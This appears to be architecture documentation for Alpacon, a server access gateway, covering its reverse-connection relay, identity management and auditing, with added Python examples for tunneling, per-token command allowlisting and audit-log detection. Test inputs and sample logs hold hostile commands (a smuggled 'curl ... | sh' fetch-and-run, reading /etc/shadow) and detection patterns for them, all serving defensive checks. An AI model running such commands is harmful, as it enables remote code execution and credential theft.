Architecture

Explanation of Alpacon’s overall system architecture and how it works.

Overview

Alpacon is an integrated access gateway providing network access, identity management, and audit capabilities in a single platform.

Problems with traditional approaches:

  • Network access: SSH and VPN are complex to operate and expose listening services that attackers can reach
  • Identity management: identities live in local accounts and keys scattered across individual servers
  • Auditing: logs are spread across per-host syslog or separate logging platforms

Alpacon solves all of these with one integrated platform.

System architecture

Network access: Websh protocol

Alpacon uses its proprietary Websh protocol to ensure both scalability and security.

Reverse connection architecture

[Server] --outbound--> [Alpacon cloud] <--inbound-- [Client]
         (HTTPS/WSS)                    (HTTPS/WSS)

Key features:

  • No inbound ports on servers (port 22 is never exposed to the network)
  • Removes the network-reachable attack surface: nothing listens for scanners or brute-force attempts
  • All connections are TLS-encrypted (HTTPS/WSS)
  • Web-friendly protocol, so servers need only the outbound web access they typically already have

On-demand tunneling

  1. The user requests access to a server
  2. A tunnel is allocated on the proxy for that session
  3. Both the user's client and the server's agent connect to the proxy (the agent outbound, as always)
  4. The proxy authenticates the session and relays traffic between the two sides
  5. The tunnel is released when the session ends
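The reverse-connection architecture and the five on-demand tunneling steps above, as an added example that is not Alpacon's code. It models the agent, relay and client on plain TCP over localhost instead of WSS, and the AGENT/DATA/CLIENT/SESSION/OK/ERROR line protocol is invented here; the point is that the agent only ever dials out, the relay pairs the two sides per session, and the tunnel is released when the client closes. The server name "prod-docker" is constructed sample input.

```python
"""Reverse-connection relay with on-demand tunnels (added example, not Alpacon's code). Roles from the
diagram above, on plain TCP over localhost instead of WSS: the agent on the server opens only OUTBOUND
connections; the relay pairs one client with one agent per session; the client never reaches the server
directly. The AGENT/DATA/CLIENT/SESSION/OK/ERROR line protocol is invented for this example."""
import asyncio
import secrets

async def pump(src, dst):
    # Copy one direction until EOF, then close the far side so the opposite pump stops too.
    try:
        while data := await src.read(4096):
            dst.write(data); await dst.drain()
    except OSError:
        pass
    finally:
        dst.close()

class Relay:
    def __init__(self):
        self.agents = {}      # server_id -> agent control channel (StreamWriter)
        self.pending = {}     # session_id -> Future awaiting the agent's data channel
        self.active = set()   # sessions being relayed right now
        self.released = []    # sessions torn down (step 5)

    async def start(self):
        self.server = await asyncio.start_server(self.handle, "127.0.0.1", 0)
        self.port = self.server.sockets[0].getsockname()[1]

    async def handle(self, reader, writer):
        parts = (await reader.readline()).decode().split()
        kind, ident = parts if len(parts) == 2 else ("", "")
        if kind == "AGENT":                                   # agent registers; control channel stays open
            self.agents[ident] = writer
        elif kind == "DATA" and ident in self.pending:        # step 3: agent's data channel for one session
            self.pending.pop(ident).set_result((reader, writer))
        elif kind == "CLIENT":                                # step 1: user requests access to `ident`
            await self.serve_client(ident, reader, writer)
        else:
            writer.close()

    async def serve_client(self, server_id, reader, writer):
        ctrl = self.agents.get(server_id)
        if ctrl is None:
            return await self.refuse(writer, b"ERROR unknown server\n")
        sid = secrets.token_hex(8)
        self.pending[sid] = fut = asyncio.get_running_loop().create_future()  # step 2: tunnel allocated
        ctrl.write(f"SESSION {sid}\n".encode()); await ctrl.drain()          # tell the agent to dial in
        try:
            a_reader, a_writer = await asyncio.wait_for(fut, timeout=5)
        except asyncio.TimeoutError:                                          # agent gone: give the slot back
            self.pending.pop(sid, None)
            return await self.refuse(writer, b"ERROR agent did not connect\n")
        self.active.add(sid)
        writer.write(b"OK\n"); await writer.drain()
        await asyncio.gather(pump(reader, a_writer), pump(a_reader, writer))  # step 4: relay both ways
        self.active.discard(sid); self.released.append(sid)                   # step 5: tunnel released

    @staticmethod
    async def refuse(writer, msg):
        writer.write(msg); await writer.drain(); writer.close()

async def run_agent(port, server_id, ready):
    """Server side: one outbound control connection plus one outbound data connection per session."""
    ctrl_r, ctrl_w = await asyncio.open_connection("127.0.0.1", port)
    ctrl_w.write(f"AGENT {server_id}\n".encode()); await ctrl_w.drain()
    ready.set()
    async def session(sid):
        r, w = await asyncio.open_connection("127.0.0.1", port)      # outbound again; nothing listens here
        w.write(f"DATA {sid}\n".encode()); await w.drain()
        while line := await r.readline():                             # stand-in for running the command
            w.write(f"ran on {server_id}: ".encode() + line); await w.drain()
        w.close()
    try:
        while line := await ctrl_r.readline():
            asyncio.create_task(session(line.decode().split()[1]))
    finally:
        ctrl_w.close()

async def run_client(port, server_id, cmd):
    """User side: connect to the relay only, send one command line, read one reply line."""
    r, w = await asyncio.open_connection("127.0.0.1", port)
    w.write(f"CLIENT {server_id}\n".encode()); await w.drain()
    status = (await r.readline()).decode().strip()
    if status == "OK":
        w.write(cmd.encode() + b"\n"); await w.drain()
        status = (await r.readline()).decode().strip()
    w.close()                                                         # closing the session frees the tunnel
    return status

async def demo():
    relay = Relay(); await relay.start()
    ready = asyncio.Event()
    agent = asyncio.create_task(run_agent(relay.port, "prod-docker", ready))
    await ready.wait()
    good = await run_client(relay.port, "prod-docker", "docker ps")
    bad = await run_client(relay.port, "no-such-server", "id")
    while not relay.released:                                         # relay tears the tunnel down asynchronously
        await asyncio.sleep(0.01)
    agent.cancel(); relay.server.close()
    return good, bad, len(relay.active), len(relay.released)

def run_demo():
    return asyncio.run(demo())
```

Running run_demo() returns the relayed reply for the registered server, the ERROR line for an unknown server, and shows the tunnel being released once the client disconnects. Note what the model leaves out on purpose: the relay does not authenticate the client or authorize the command (step 4 in a real deployment), and the agent's control channel has no reconnect logic, which is what the session persistence section below is about.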

Accessibility: Session persistence

Alpacon’s Websh sessions work reliably even with temporary network issues.

Features:

  • Cloud-based connections without VPN
  • Sessions persist unless explicitly terminated by user
  • Automatic session recovery on network reconnection
  • Complete shell access from mobile browsers

Resource management

Centrally manage all server assets.

Simple server registration

Register your server through the Alpacon workspace (Servers → Connect Server) and run the generated installation script. The entire process takes less than 5 minutes. As with any generated installer that runs with elevated privileges, inspect the script before executing it on a production host.

See the Quickstart guide for step-by-step instructions.

Features provided:

  • Real-time resource status monitoring
  • Connection status alerts
  • Group-based permission management
  • Role-based access control

Key components

1. Alpamon agent (server-side)

Lightweight agent installed on servers to communicate with Alpacon cloud.

Functions:

  • Maintain the outbound HTTPS/WSS connection to Alpacon cloud
  • Monitor system status
  • Execute commands and transfer files on behalf of authorized sessions
  • Update itself automatically

2. Alpacon cloud (central platform)

Cloud service that relays all connections and hosts the management plane.

Components:

  • Access Gateway: Connection relay and proxy
  • Identity Provider: User authentication and permission management
  • Audit Logger: All activity logging and monitoring
  • API Server: REST API and CLI support

3. Clients (user-side)

Various ways to access servers.

Access methods:

  • Web browser: Immediate access without installation
  • Alpacon CLI: Command-line interface
  • REST API: Programmatic access
  • Mobile: Mobile browser support

Identity and Access Management (IAM)

Centralized identity management

All server access identities are centrally managed and provisioned.

Process:

  1. New employee → invited to Alpacon
  2. System account provisioned automatically on first access to a server
  3. Permission changes synchronized automatically to the affected servers
  4. Access revoked immediately on termination

Enhanced authentication

Supported MFA methods:

  • Biometric
  • Hardware security key
  • OTP (One-Time Password)
  • Email
  • SMS

Single sign-on:

  • Google Workspace
  • SAML (coming soon)

Passwordless system accounts

  • All system accounts created passwordless
  • Accessible only through Alpacon
  • Direct SSH key/password use blocked

Integration and interoperability

CI/CD pipeline integration

Use fine-grained API tokens instead of SSH keys in pipelines, so that a leaked pipeline credential can only run the commands it was scoped to.

CLI usage example

# Login
alpacon login https://alpacon.io/my-workspace -t "alpat-..."
 
# File upload
alpacon cp docker-compose.yml prod-docker:/opt/my-app/
alpacon cp .env prod-docker:/opt/my-app/
 
# Command execution
alpacon websh prod-docker docker compose -p my-app --env-file .env up -d

REST API usage example

curl -X POST https://your-workspace.us1.alpacon.io/api/events/commands/ \
     -H "Content-Type: application/json" \
     -H "Authorization: Token alpat-..." \
     -d '{"server": "7a50ea6c-2138-4d3f-9633-e50694c847c4", "line": "docker ps", "username": "docker"}'

Advantages:

  • Fine-grained command restrictions
  • Each token can execute only the commands it has been allowed
  • Limits the blast radius of a leaked or misused CI token
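The per-token command restriction described above, as an added example of the enforcement logic rather than Alpacon's own policy engine or policy format. The TokenPolicy structure, the token id "alpat-ci-deploy" and the allowlist are constructed for illustration. The security-relevant part is parse_command: a naive allowlist that matches on the first word accepts "docker ps; rm -rf /", so the checker tokenizes the line like a POSIX shell and rejects anything containing chaining, redirection or substitution characters before comparing argv against allowed prefixes.

```python
"""Per-token command allowlisting for CI (added example; policy format is hypothetical, not Alpacon's)."""
import re
import shlex
from dataclasses import dataclass

# Anything that could chain, redirect, substitute or background a command. The lexer already splits
# ; & | < > ( ) into their own tokens; $ and backtick are caught inside tokens as well.
SHELL_META = re.compile(r"[;&|<>()`$]")


@dataclass(frozen=True)
class TokenPolicy:
    token_id: str
    servers: frozenset      # servers this token may reach
    username: str           # system account it may run as
    allowed: tuple          # argv prefixes, e.g. ("docker", "compose")


def parse_command(line: str):
    """Tokenize like a POSIX shell; return None unless `line` is exactly one simple command."""
    try:
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True          # keep my-app, .env, host:/path as single tokens
        argv = list(lexer)
    except ValueError:                         # unbalanced quotes
        return None
    if not argv or any(SHELL_META.search(tok) for tok in argv):
        return None
    return argv


def authorize(policy: TokenPolicy, server: str, username: str, line: str):
    """Deny by default: server, account and argv prefix must all be within the token's scope."""
    if server not in policy.servers:
        return False, f"server {server!r} outside token scope"
    if username != policy.username:
        return False, f"account {username!r} outside token scope"
    argv = parse_command(line)
    if argv is None:
        return False, "rejected: empty, unbalanced quotes, or shell metacharacters"
    for prefix in policy.allowed:
        if tuple(argv[: len(prefix)]) == prefix:
            return True, "matched " + " ".join(prefix)
    return False, f"{argv[0]!r} not in allowlist"


# Constructed policy: a deploy token limited to compose/ps as the docker account on prod-docker.
CI_DEPLOY = TokenPolicy(
    token_id="alpat-ci-deploy",
    servers=frozenset({"prod-docker"}),
    username="docker",
    allowed=(("docker", "compose"), ("docker", "ps")),
)

if __name__ == "__main__":
    for cmd in ["docker ps", "docker compose -p my-app --env-file .env up -d",
                "docker ps; curl http://203.0.113.5/x | sh", "bash -c 'docker ps'",
                "docker run --privileged alpine"]:
        print(f"{cmd!r:60} -> {authorize(CI_DEPLOY, 'prod-docker', 'docker', cmd)}")
```

Keep prefixes as specific as the pipeline allows: ("docker", "compose") still admits "docker compose exec", so a token that only needs to deploy should list ("docker", "compose", "up") and ("docker", "compose", "pull") instead. The metacharacter check is deliberately conservative; an argument that legitimately needs "$" or "|" should go in a file uploaded with cp rather than on the command line.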

Auditing

Complete tracking of all server access and activities.

Features provided

  • Real-time monitoring: watch user terminal activity as it happens
  • Anomaly detection: block the session immediately when abnormal activity is detected
  • Post-audit: review every executed command after the fact
  • Full visibility: a complete record of all user activity across all servers

Audit log contents

  • Who (user/token)
  • When (timestamp)
  • Where (server/IP)
  • What (command executed/results)
  • Why (session context)
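The anomaly-detection and post-audit features described above, run over records with exactly the who/when/where/what fields just listed. This is an added example, not Alpacon's detector or its log schema: the JSON record layout, the field names, the sample log lines and the three rules (pipe-to-shell and credential-file commands, one token used from two source addresses within ten minutes, interactive commands outside business hours) are all constructed here to show what centralized records make easy that scattered syslog does not.

```python
"""Detection rules over session audit records (added example; record format is assumed, not Alpacon's)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed audit records: one JSON object per line carrying who / when / where / what.
SAMPLE_LOG = """\
{"actor": "alice@example.com", "kind": "user",  "ts": "2024-05-01T09:00:05Z", "server": "prod-docker", "src_ip": "203.0.113.10", "cmd": "docker ps"}
{"actor": "alpat-ci-deploy",   "kind": "token", "ts": "2024-05-01T09:01:00Z", "server": "prod-docker", "src_ip": "198.51.100.7",  "cmd": "docker compose -p my-app up -d"}
{"actor": "alpat-ci-deploy",   "kind": "token", "ts": "2024-05-01T09:03:30Z", "server": "prod-docker", "src_ip": "192.0.2.44",    "cmd": "docker compose -p my-app up -d"}
{"actor": "alice@example.com", "kind": "user",  "ts": "2024-05-01T09:04:00Z", "server": "prod-docker", "src_ip": "203.0.113.10", "cmd": "curl -s http://198.51.100.9/x.sh | sh"}
{"actor": "bob@example.com",   "kind": "user",  "ts": "2024-05-01T22:30:00Z", "server": "prod-docker", "src_ip": "203.0.113.11", "cmd": "cat /etc/shadow"}
"""

RISKY = [  # (rule name, pattern): command shapes a reviewer wants surfaced immediately
    ("pipe_to_shell", re.compile(r"\|\s*(sh|bash|zsh)\b")),
    ("credential_file", re.compile(r"/etc/(shadow|sudoers)\b")),
    ("world_writable", re.compile(r"\bchmod\s+(-R\s+)?[0-7]?777\b")),
]
TOKEN_IP_WINDOW = timedelta(minutes=10)   # a CI token seen from two addresses this close is suspicious
BUSINESS_HOURS = range(8, 20)             # UTC hours considered normal for interactive users


def parse(log_text: str) -> list:
    """Parse JSON lines into records with a timezone-aware datetime, oldest first."""
    records = []
    for line in log_text.splitlines():
        if line.strip():
            rec = json.loads(line)
            rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
            records.append(rec)
    return sorted(records, key=lambda r: r["ts"])


def finding(rule: str, rec: dict, detail: str) -> dict:
    """Emit a finding that keeps the who/when/where/what of the record that triggered it."""
    return {"rule": rule, "who": rec["actor"], "when": rec["ts"].isoformat(),
            "where": f'{rec["server"]} from {rec["src_ip"]}', "what": rec["cmd"], "detail": detail}


def detect(log_text: str) -> list:
    findings = []
    seen = defaultdict(list)   # token -> [(ts, src_ip)] for the address-spread rule
    for rec in parse(log_text):
        for rule, pat in RISKY:
            if pat.search(rec["cmd"]):
                findings.append(finding(rule, rec, f"matched /{pat.pattern}/"))
        if rec["kind"] == "token":
            other = sorted({ip for ts, ip in seen[rec["actor"]]
                            if rec["ts"] - ts <= TOKEN_IP_WINDOW and ip != rec["src_ip"]})
            if other:
                findings.append(finding("token_ip_spread", rec, f"also used from {other} within {TOKEN_IP_WINDOW}"))
            seen[rec["actor"]].append((rec["ts"], rec["src_ip"]))
        elif rec["ts"].hour not in BUSINESS_HOURS:
            findings.append(finding("off_hours_interactive", rec, f"{rec['ts'].hour:02d}:00 UTC"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['rule']:22} {f['who']:20} {f['when']}  {f['where']:32} {f['what']}")
```

On the constructed log this yields four findings: the deploy token used from a second address two and a half minutes after the first (the signature of a leaked pipeline credential), alice piping a download into sh, and bob reading /etc/shadow at 22:30. The token rule only works because every token session is recorded with its source address in one place; the "immediate blocking" feature above is the natural action to attach to it.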

Security design principles

Zero Trust architecture

  • Move beyond perimeter-based security strategies
  • Verify all access requests
  • Principle of least privilege
  • Continuous verification

Defense in depth

  • Multi-layered security structure
  • No single control is a single point of failure
  • Encrypted communications
  • Audit trail

Modern approach

  • SSH designed for humans → Alpacon supports both humans and machines
  • Static key management → Dynamic token management
  • Distributed logging → Centralized auditing

Availability

  • Redundant deployment as a managed cloud service
  • High availability guarantee
  • Automatic failover
  • Global region support